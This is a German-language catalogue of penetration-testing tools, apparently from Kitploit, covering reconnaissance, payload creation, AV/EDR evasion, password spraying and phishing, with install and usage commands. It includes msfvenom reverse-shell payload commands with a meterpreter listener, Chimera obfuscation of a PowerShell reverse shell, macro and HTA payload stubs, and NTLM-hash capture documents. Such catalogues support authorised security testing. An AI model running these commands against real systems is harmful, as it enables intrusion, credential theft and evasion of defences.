Feroxbuster verwendet Brute Force in Kombination mit einer Wortliste, um nach unverlinkten Inhalten in Zielverzeichnissen zu suchen. Diese Ressourcen können sensible Informationen über Webanwendungen und Betriebssysteme speichern, wie Quellcode, Anmeldedaten, interne Netzwerkadressierung usw.

**Installation: (Kali)**```bash
sudo apt update && sudo apt install -y feroxbuster

Installation: (Mac)```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

root@kitploit:~
**Installation: (Windows)**```bash
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

Für vollständige Installationsanweisungen siehe hier.

Nutzung:```bash

Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url

./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

Scan with headers

./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

Read URLs from stdin

cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

Proxy requests through burpsuite

./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

root@kitploit:~
Vollständige Nutzungsbeispiele finden Sie [hier](https://epi052.github.io/feroxbuster-docs/docs/examples/).

![image](https://assets.kitploit.com/production/public/readmes/147/bddd1a012eb92f79a03b1f6dd3cb9f31a9b0751776541044adcf234332421a08.png)

*Bild verwendet von https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif*

### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute)

Ein Tool zum Auffinden der Infrastruktur, Dateien und Apps eines Unternehmens (Ziels) auf den führenden Cloud-Anbietern (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Funktionen:

- Cloud-Erkennung (IPINFO API und Quellcode)
- Schnell (gleichzeitig)
- Plattformübergreifend (windows, linux, mac)
- User-Agent-Randomisierung
- Proxy-Randomisierung (HTTP, Socks5)

**Installation:** 

Laden Sie die neueste [Version](https://github.com/0xsha/CloudBrute/releases) für Ihr System herunter und folgen Sie der Nutzung.

**Verwendung:**```bash
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Bild verwendet von https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon ist ein pyhton-Tool zur Aufzählung von DNS-Einträgen (MX, SOA, NS, A, AAAA, SPF und TXT) und kann aus einer einzigen Domain-Suche eine Reihe neuer, zugehöriger Opfer-Hosts zum Weiterleiten (Pivot) bereitstellen.

Installation:```bash sudo apt install dnsrecon

root@kitploit:~
**Verwendung:**```bash
dnsrecon -d google.com

image

🔙shodan.io

Shodan durchsucht die öffentliche Infrastruktur und zeigt sie in einem durchsuchbaren Format an. Mit einem Firmennamen, Domainnamen oder einer IP-Adresse ist es möglich, über Shodan potenziell anfällige Systeme in Bezug auf Ihr Ziel zu entdecken.

image

🔙AORT

Tool zum Auflisten von Subdomains, DNS-Auflistung, WAF-Erkennung, WHOIS, Portscan, Wayback Machine, E-Mail-Harvesting.

Install:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**Verwendung:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

Ein Programm, das prüft, ob eine Domain gespooft werden kann. Das Programm überprüft SPF- und DMARC-Einträge auf schwache Konfigurationen, die Spoofing ermöglichen. Zusätzlich warnt es, wenn die Domain eine DMARC-Konfiguration hat, die bei fehlgeschlagenen SPF-/DKIM-E-Mails E-Mails oder HTTP-Anfragen sendet.

Domänen sind spoofbar, wenn eine der folgenden Bedingungen erfüllt ist:

  • Fehlen eines SPF- oder DMARC-Eintrags
  • SPF-Eintrag spezifiziert nie ~all oder -all
  • DMARC-Richtlinie ist auf p=none gesetzt oder nicht vorhanden

Installation:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**Verwendung:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump ist ein Tool zur schnellen Enumeration von AWS S3 Buckets, um nach interessanten Dateien zu suchen. Es ähnelt einem Subdomain-Bruteforcer, ist aber speziell für S3 Buckets ausgelegt und bietet zusätzliche Funktionen, mit denen Sie nach Dateien grep sowie interessante Dateien herunterladen können.

Installation:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**Verwendung:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Nützliches Tool zum Auffinden von Informationen aus GitHub mit Regex, mit der Möglichkeit, nach bestimmten GitHub-Benutzern und/oder Projekten zu suchen.

Install:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**Verwendung:**```
./githarvester.py

🔙truffleHog

TruffleHog ist ein Tool, das Git-Repositorys scannt und nach Zeichenfolgen mit hoher Entropie sowie Mustern sucht, die auf das Vorhandensein von Geheimnissen wie Passwörtern und API-Schlüsseln hinweisen können. Mit TruffleHog können Sie schnell und einfach vertrauliche Informationen finden, die versehentlich in ein Repository committet und gepusht wurden.

Installation (Binärdateien): Link

Installation (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**Verwendung:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap ist ein Werkzeug zur Erkennung und Identifizierung von Assets. Es kann schnell Protokolle und Fingerabdruckinformationen wie web/tcp/udp identifizieren, Asset-Typen lokalisieren und ist für interne und externe Netzwerke geeignet.

Dismap verfügt über eine vollständige Fingerabdruck-Regelbasis, die derzeit tcp/udp/tls-Protokoll-Fingerabdrücke und über 4500 Web-Fingerabdruck-Regeln umfasst, mit denen favicon, body, header usw. identifiziert werden können.

Installation:

Dismap ist eine Binärdatei für Linux, MacOS und Windows. Gehen Sie zu Release, um die entsprechende Version herunterzuladen und auszuführen:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**Verwendung:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Bild verwendet von https://github.com/zhzyker/dismap

🔙enum4linux

Ein Tool zum Auslesen von Informationen aus Windows- und Samba-Systemen.

Es kann genutzt werden, um eine breite Palette an Informationen zu sammeln, darunter:

  • Domänen- und Domänencontroller-Informationen
  • Informationen zu lokalen Benutzern und Gruppen
  • Freigaben und Freigabeberechtigungen
  • Sicherheitsrichtlinien
  • Active Directory-Informationen

Installieren: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**Installation: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Verwendung:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
Vollständige Nutzungsinformationen finden Sie in diesem [Blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/147/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

*Bild verwendet von https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Gefährlich schneller DNS-/Netzwerk-/Port-Scanner, erstellt von [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), geschrieben in rust.

Sie benötigen eine Subdomain-Datei. *z.B. [Subdomain-Wortliste von Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.

**Installation:** 

Laden Sie die neueste Version von [hier](https://github.com/Esc4iCEscEsc/skanuvaty/releases) herunter.```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Verwendung:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![Bild](https://assets.kitploit.com/production/public/readmes/147/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

*Bild verwendet von https://github.com/Esc4iCEscEsc/skanuvaty*

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor ist ein Intelligence-Tool, dessen Ziel es ist, OSINT-Aufgaben und mehr zu erledigen, jedoch ohne API-Schlüssel.

**Hauptfunktionen:**

- Suche nach Informationen über IP-Adresse, ASN und Organisation.
- Wrapper für effizienteres Ausführen von rustscan, masscan und nmap auf IP/CIDR.
- Finden weiterer verwandter Domains des Ziels durch Anwendung verschiedener Techniken (Zertifikat, Whois, Google Analytics usw.).
- Zusammenfassung über IP-Adresse erhalten (unterstützt von [@thebl4ckturtle](https://github.com/theblackturtle))

**Installation:**```bash
go install github.com/j3ssie/metabigor@latest

Verwendung:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

*Bild verwendet von https://github.com/j3ssie/metabigor*

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob ist ein Tool, das dabei hilft, potenziell sensible Dateien zu finden, die in öffentliche Repositories auf Github gepusht wurden.

Gitrob klont Repositories eines Benutzers oder einer Organisation bis zu einer konfigurierbaren Tiefe, durchläuft die Commit-Historie und markiert Dateien, die Signaturen für potenziell sensible Dateien entsprechen.

Die Ergebnisse werden über eine Weboberfläche präsentiert, die eine einfache Durchsicht und Analyse ermöglicht.

**Hinweis:** *Gitrob benötigt ein Github-Zugriffstoken, um mit der Github API interagieren zu können. [Erstellen Sie ein persönliches Zugriffstoken](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) und speichern Sie es in einer Umgebungsvariable in Ihrer .bashrc oder einer ähnlichen Shell-Konfigurationsdatei:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Installieren: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**Installation: (Binär)** 

Eine [vorkompilierte Version](https://github.com/michenriksen/gitrob/releases) ist für jedes Release verfügbar.

**Verwendung:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Bild verwendet von https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness ist ein Dienstprogramm für Website-Screenshots, geschrieben in Golang, das Chrome Headless verwendet, um Screenshots von Weboberflächen über die Befehlszeile zu erstellen, mit einem praktischen Berichtsbetrachter zur Verarbeitung der Ergebnisse. Sowohl Linux als auch macOS werden unterstützt, die Windows-Unterstützung funktioniert größtenteils.

Installation: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
Vollständige Installationsinformationen finden Sie [hier](https://github.com/sensepost/gowitness/wiki/Installation).

**Verwendung:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Vollständige Nutzungsinformationen finden Sie hier.

image

Bild verwendet von https://github.com/sensepost/gowitness

Ressourcenentwicklung

🔙remoteInjector

Injiziert Link zu einer entfernten Word-Vorlage in ein Word-Dokument.

Dieses Python-basierte Dienstprogramm ändert den Link in settings.xml.rels einer .docx-Datei zu einer remote gehosteten .dotm-Vorlage, die ein VBA-Makro enthält. Dieses wird ausgeführt, wenn das Dokument geöffnet und Makros aktiviert sind.

Verwandter Blogbeitrag

Installation:```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector

root@kitploit:~
**Verwendung:**```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx

🔙Chimera

Chimera ist ein PowerShell-Obfuskierungsskript, das entwickelt wurde, um AMSI und Antivirenlösungen zu umgehen. Es verarbeitet bösartige PS1's, die bekanntermaßen AV auslösen, und verwendet Zeichenersetzung und Variablenverkettung, um gängige Erkennungssignaturen zu umgehen.

Installation:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**Nutzung:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenom ermöglicht die Erstellung von Payloads für verschiedene Betriebssysteme in einer Vielzahl von Formaten. Es unterstützt auch die Verschleierung von Payloads zur Umgehung von Antivirenprogrammen.

Listener einrichten```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Msfvenom Befehle

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellter ist ein dynamisches Shellcode-Injektionswerkzeug und der erste wirklich dynamische PE-Infektor, der je erstellt wurde.

Es kann verwendet werden, um Shellcode in native Windows-Anwendungen (derzeit nur 32-Bit-Anwendungen) zu injizieren.

Shellter nutzt die ursprüngliche Struktur der PE-Datei aus und wendet keine Änderungen wie das Ändern von Speicherzugriffsberechtigungen in Abschnitten an (es sei denn, der Benutzer wünscht dies), das Hinzufügen eines zusätzlichen Abschnitts mit RWE-Zugriff oder ähnliches, was bei einem AV-Scan verdächtig wirken würde.

Die vollständige README-Information finden Sie hier.

Install: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**Installation: (Windows)** 

Besuchen Sie die [Download-Seite](https://www.shellterproject.com/download/) und installieren Sie es.

**Verwendung:** 

Wählen Sie einfach eine legitime Binärdatei aus, um eine Hintertür einzubauen, und führen Sie Shellter aus.

Einige nützliche Tipps finden Sie [hier](https://www.shellterproject.com/tipstricks/).

Viele Community-Demos zur Nutzung finden Sie [hier](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/147/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

*Bild verwendet von https://www.kali.org/tools/shellter/images/shellter.png*

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze ist ein Tool zur Erstellung von Payloads, das verwendet wird, um EDR-Sicherheitskontrollen zu umgehen und Shellcode auf eine unauffällige Weise auszuführen.

Freeze nutzt mehrere Techniken, um nicht nur Userland-EDR-Hooks zu entfernen, sondern auch Shellcode so auszuführen, dass es andere Endpunkt-Überwachungskontrollen umgeht.

**Installation:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Nutzung:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

*Image used from https://www.blackhatethicalhacking.com/tools/freeze/*

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

Dieses Skript erstellt ein Microsoft Word-Dokument mit einem entfernten Bild, was die Erfassung von NTML-Hashes von einem entfernten Opfer-Endpunkt ermöglicht.

Microsoft Word verfügt über die Fähigkeit, Bilder von entfernten Standorten einzubinden, einschließlich eines entfernten Bildes, das auf einem vom Angreifer kontrollierten SMB-Server gehostet wird. Dies bietet Ihnen die Möglichkeit, NTLM-Hashes zu empfangen und zu erfassen, die gesendet werden, wenn ein authentifiziertes Opfer das Word-Dokument öffnet und das Bild rendert.

**Installation:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Verwendung:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

*Bild verwendet von https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*

### [🔙](#tool-list)[NTAPI Undokumentierte Funktionen](http://undocumented.ntinternals.net/)

Diese Seite bietet Informationen über undokumentierte Windows-Interna, Systemaufrufe, Datenstrukturen und andere Details auf niedriger Ebene des Windows-Betriebssystems. 

Sie kann eine wertvolle Ressource für Personen sein, die die Interna von Windows für verschiedene Zwecke erkunden möchten, einschließlich Schwachstellenanalyse, Exploit-Entwicklung und Privilegienausweitung.

Bei der Entwicklung von Exploits ist es entscheidend, die Interna des Zielsystems zu verstehen. Diese Seite kann bei der Entwicklung von Exploits helfen, indem sie die undokumentierten Aspekte auf niedriger Ebene von Windows nutzt.

**Verwendung:** 

Besuche [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

![image](https://assets.kitploit.com/production/public/readmes/147/3c88e47b3afc58cee00fe06443626d0ac8354195bf3988c973cfeefdce21d197.png)

*Bild verwendet von http://undocumented.ntinternals.net/*

### [🔙](#tool-list)[Kernel Callback-Funktionen](https://codemachine.com/articles/kernel_callback_functions.html)

Dieser technische Hinweis bietet eine umfassende Liste aller vom Windows-Kernel exportierten APIs, mit denen Treiberentwickler Callback-Routinen registrieren können, die von Kernel-Komponenten unter verschiedenen Umständen aufgerufen werden. 

Die meisten dieser Routinen sind im Windows Driver Kit (WDK) dokumentiert, einige jedoch sind für die Verwendung durch integrierte Treiber vorgesehen. 

Die undokumentierten Funktionen werden kurz beschrieben, während die dokumentierten hier nur als Referenz aufgeführt sind.

**Verwendung:** 

Besuche [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

![image](https://assets.kitploit.com/production/public/readmes/147/ccdbb9756a5efe851f7366430ee13b1e380ba5a8a3be2e71d93788f7c71f32f7.png)

*Bild verwendet von https://codemachine.com*

### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)

Eine Sammlung von offensiven Techniken, Skripten und nützlichen Links zur Erreichung von Codeausführung und Verteidigungsumgehung mittels Office-Makros.

**Verwendung:** 

Besuche [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

![image](https://assets.kitploit.com/production/public/readmes/147/a1e2be51d71eb16d0dc2e331e56089899a00da59681226f64a584c249bbde6fd.png)

*Bild verwendet von https://github.com/S3cur3Th1sSh1t*

### [🔙](#tool-list)WSH

**Erstellen des Payloads:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Ausführen:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**Payload erstellen:**```html
<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Ausführen: Datei ausführen

🔙VBA

Payload erstellen:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**Ausführen:** Setzen Sie die Funktion auf Auto_Open() im makroaktivierten Dokument

Erstzugriff
====================

### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)

Führen Sie einen Password-Spray-/Brute-Force-Angriff über Amazon AWS Passthrough-Proxys durch, wobei die anfragende IP-Adresse bei jedem Authentifizierungsversuch geändert wird. Dies erstellt dynamisch FireProx-APIs für umgehungsfähigere Password Sprays.

CredMaster bietet eine Methode zur Durchführung anonymer Password Sprays gegen Endpunkte in einem einfachen, benutzerfreundlichen Tool. Das FireProx-Tool stellt die rotierende Anfrage-IP bereit, während die Basis von CredMaster alle anderen identifizierenden Informationen fälscht.

Funktionen:
- Unterstützt vollständig alle AWS-Regionen
- Generiert automatisch APIs für die Proxy-Durchleitung
- Fälscht API-Tracking-Nummern, Forwarded-For-IPs und andere Proxy-Tracking-Header
- Multithreaded-Verarbeitung
- Verzögerungszähler für Passwörter und Konfiguration zur Umgehung von Sperrrichtlinien
- Einfaches Hinzufügen neuer Plugins
- Vollständig anonym

**Installation:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt

Vollständige Installationsanweisungen finden Sie hier.

Verwendung:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json

root@kitploit:~
Dieses Tool benötigt AWS-API-Zugriffsschlüssel, eine Anleitung zur Beschaffung dieser Schlüssel finden Sie hier: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

![credmaster](https://assets.kitploit.com/production/public/readmes/147/0b3b39000bca40b701781836c94d98cc1efa1c23783a2344bfbf30fde4293d4a.png)

*Bild verwendet von https://github.com/knavesec/CredMaster/wiki*

### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)

TREVORspray ist ein modularer Passwort-Sprayer mit Threading, SSH-Proxying, Loot-Modulen und mehr!

**Install:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray

Verwendung:```bash

Recon

python3 ./trevorspray --recon evilcorp.com

Enumerate users via OneDrive

python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10

Spray against discovered

python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token

root@kitploit:~
For full usage instructions see [here](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

![TREVORspray](https://assets.kitploit.com/production/public/readmes/147/7663363d4be94c22481a92a86f36f1777a8f9c4d85ad76ca3df5ee09096deb09.png)

*Image used from https://github.com/blacklanternsecurity/TREVORspray*

### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)

Toolkit, das einen weiteren Ansatz eines QRLJacking-Angriffs demonstriert und es ermöglicht, durch QR-Code-Phishing bei der Anmeldung eine Remote-Kontoübernahme durchzuführen.

Es besteht aus einer Browsererweiterung, die vom Angreifer verwendet wird, um den Anmelde-QR-Code zu extrahieren, und einer Serveranwendung, die die Anmelde-QR-Codes abruft, um sie auf den gehosteten Phishing-Seiten anzuzeigen.

Demo [Video](https://www.youtube.com/watch?v=8pfodWzqMcU)

**Installation: (Erweiterung)** 

Sie können die Erweiterung in Chrome über die Funktion `Load unpacked` laden:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

Sobald die Erweiterung installiert ist, stellen Sie sicher, dass Sie ihr Symbol in der Chrome-Erweiterungsleiste anheften, damit das Symbol immer sichtbar ist.

**Installation: (Server)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat

Verwendung:

  1. Starte den Server, indem du die erstellte Server-Binärdatei ausführst: ./server/build/evilqr-server
  2. Öffne eine der unterstützten Websites in deinem Chrome-Browser mit der installierten Evil QR-Erweiterung:``` https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login
root@kitploit:~
3. Stellen Sie sicher, dass der Anmelde-QR-Code sichtbar ist, und klicken Sie auf das **Evil QR**-Erweiterungssymbol in der Symbolleiste. Wenn der QR-Code erkannt wird, sollte das Symbol farbig aufleuchten.
4. Öffnen Sie die Phishing-Seiten-URL des Servers: `http://127.0.0.1:35000` (Standard)

![evilqr](https://assets.kitploit.com/production/public/readmes/147/f8ff7150038690a1c6608be4071593f736ccb4369d43ebc0af44791c020e2b15.png)

*Bild verwendet von https://breakdev.org/evilqr-phishing/*

### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)

Die häufigste Form der Authentifizierung ist die Kombination aus Benutzername und Passwort oder Passphrase. Passwörter können manchmal durch Profiling des Benutzers erraten werden, wie z.B. Geburtstag, Spitzname, Adresse, Name eines Haustiers oder Verwandten oder ein gebräuchliches Wort wie Gott, Liebe, Geld oder Passwort.

Deshalb wurde CUPP entwickelt.

**Installieren:**```bash
git clone https://github.com/Mebus/cupp;cd cupp

Verwendung:```bash

Run in interactive mode

python3 ./cupp.py -i

root@kitploit:~
![cupp](https://assets.kitploit.com/production/public/readmes/147/1c9d63a8d34972498c7a267463fc4233869f68059aee885a2b88ce276cfffffb.png)

*Bild verwendet von https://github.com/Mebus/cupp*

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Der Bash Bunny ist ein physisches USB-Angriffswerkzeug und ein multifunktionales Payload-Bereitstellungssystem. Es wird in den USB-Anschluss eines Computers gesteckt und kann programmiert werden, um eine Vielzahl von Funktionen auszuführen, darunter die Manipulation und Exfiltration von Daten, die Installation von Schadsoftware und die Umgehung von Sicherheitsmaßnahmen.

[hackinglab: Bash Bunny – Leitfaden](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 Dokumentation](https://docs.hak5.org/bash-bunny/)

[Nützliches Payload-Repository](https://github.com/hak5/bashbunny-payloads)

[Produktseite](https://hak5.org/products/bash-bunny)

![image](https://assets.kitploit.com/production/public/readmes/147/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish ist ein leistungsstarkes Open-Source-Phishing-Framework, das es einfach macht, die Anfälligkeit Ihrer Organisation für Phishing zu testen. (evilginx2) Ein eigenständiges Man-in-the-Middle-Angriffsframework, das verwendet wird, um Anmeldedaten zusammen mit Sitzungscookies zu phishen und so die Umgehung der Zwei-Faktor-Authentifizierung zu ermöglichen.

**Installation:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

Verwendung:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

Dieses Framework ist großartig für die Erstellung von Kampagnen für den Erstzugriff. 'SET verfügt über eine Reihe benutzerdefinierter Angriffsvektoren, mit denen Sie schnell einen glaubwürdigen Angriff durchführen können.'

